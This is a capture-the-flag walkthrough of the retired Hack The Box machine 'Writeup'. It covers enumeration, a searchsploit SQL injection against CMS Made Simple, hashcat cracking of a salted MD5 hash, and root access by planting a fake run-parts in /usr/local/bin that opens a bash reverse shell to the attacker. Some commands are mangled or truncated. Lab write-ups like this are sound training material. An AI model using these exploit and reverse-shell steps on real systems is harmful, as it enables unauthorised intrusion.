HTB Walkthrough: Writeup (retired)
Writeup is a retired box on HTB.

Hostname: Writeup | Difficulty Level: Easy | Operating System: Linux
NMAP scan

We can see port 22 and 80 open.
HTTP Enumeration
Browsing to ‘’ reveals that it was under DOS attack so it is prevented by Eeyore DoS protection. Lets check for common files such as robots.txt, admin, etc. manually.
We get a hit for ‘’.

It says ‘Disallow: /writeup/’. The disallow directive specifies paths that must not be accessed by the designated crawlers. When no path is specified, the directive is ignored. Browsing to ‘’ reveals a web page.
Running gobuster reveals a login page at ‘’.
└─$ sudo gobuster dir -t 50 — url — wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt/modules (Status: 301)
/uploads (Status: 301)
/doc (Status: 301)
/assets (Status: 301)
/admin (Status: 401)
If you view source code for ‘’ then you will see that it is ‘CMS Made Simple’.

Google search for ‘CMS Made Simple’ and look for the code. Since it is open source, you can visit the directory structure here: Even that reveals that there is an ‘/admin’ portal. Further, you can view the version of CMS from ‘/doc/CHANGELOG.txt’ i.e. browse to ‘’. CHANGELOG.txt will reveal the version to be ‘’.
Looking into searchsploit.
└─$ searchsploit CMS Made Simple
└─$ searchsploit -m php/webapps/
Using the ‘CMS Made Simple < 2.2.10 — SQL Injection’.
Pre-requisities: Install pip for python2 and install package ‘termcolor’
i. curl — output
ii. sudo python2
iii. pip — version (Make sure it belongs to python2)
iv. sudo pip install — upgrade setuptools
v. sudo python2.7 -m pip install termcolor

In order to find the hash type of password hash found above, use ‘hash-identifier’ tool. It suggests MD5. So, let’s use hashcat to crack the password with mode ‘20’. Save the ‘hash:salt’ in a file. Modes 10 and 20 use ‘hash:salt’ format.

Trying the credentials on ‘http://10,10.10.138/writeup/admin' did not work. Trying ssh using the credentials and you will be logged in as ‘jkr’ user. You will user flag.
Privilege Escalation
We do not have execution permissions in /dev/shm. Trying to run ‘pspy’ in /tmp folder. Keep ‘pspy64s’ running in one tab and try to do ssh from another tab, you will see below entry (one with incomplete path):
2021/02/15 18:14:08 CMD: UID=0 PID=2454 | sshd: jkr [priv]
2021/02/15 18:14:08 CMD: UID=0 PID=2455 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts — lsbsysinit /etc/update-motd.d > /run/
2021/02/15 18:14:08 CMD: UID=0 PID=2456 | run-parts — lsbsysinit /etc/update-motd.d
2021/02/15 18:14:08 CMD: UID=0 PID=2457 | /bin/sh /etc/update-motd.d/10-uname
2021/02/15 18:14:08 CMD: UID=0 PID=2458 | sshd: jkr [priv]
jkr@writeup:/tmp$ which run-parts
jkr@writeup:/bin$ echo $PATH
Since, /usr/local/bin comes before ‘/bin’, we could perform path injection. Create a file ‘run-parts’ in ‘/usr/local/bin’. We have privileges to create file in ‘/usr/local/bin’ because jkr is member of ‘staff’ (from
jkr@writeup:/tmp$ ls -la /usr/local | grep bin
drwx-wsr-x 2 root staff 20480 Feb 15 21:40 bin
drwx-wsr-x 2 root staff 12288 Apr 19 2019 sbin
As per article at ‘’
staff: Allows users to add local modifications to the system (/usr/local) without needing root privileges (note that executables in /usr/local/bin are in the PATH variable of any user, and they may “override” the executables in /bin and /usr/bin with the same name).
Contents of file ‘/usr/local/bin/run-parts’ are as follows:
bash -i >& /dev/tcp/<kali-ip>/9876 0>&1
jkr@writeup:/usr/local/bin$ chmod +x run-parts
Open a netcat session on port 9876 or any other port in kali machine. SSH using jkr credentials and you will get a root shell in your netcat session along with root flag.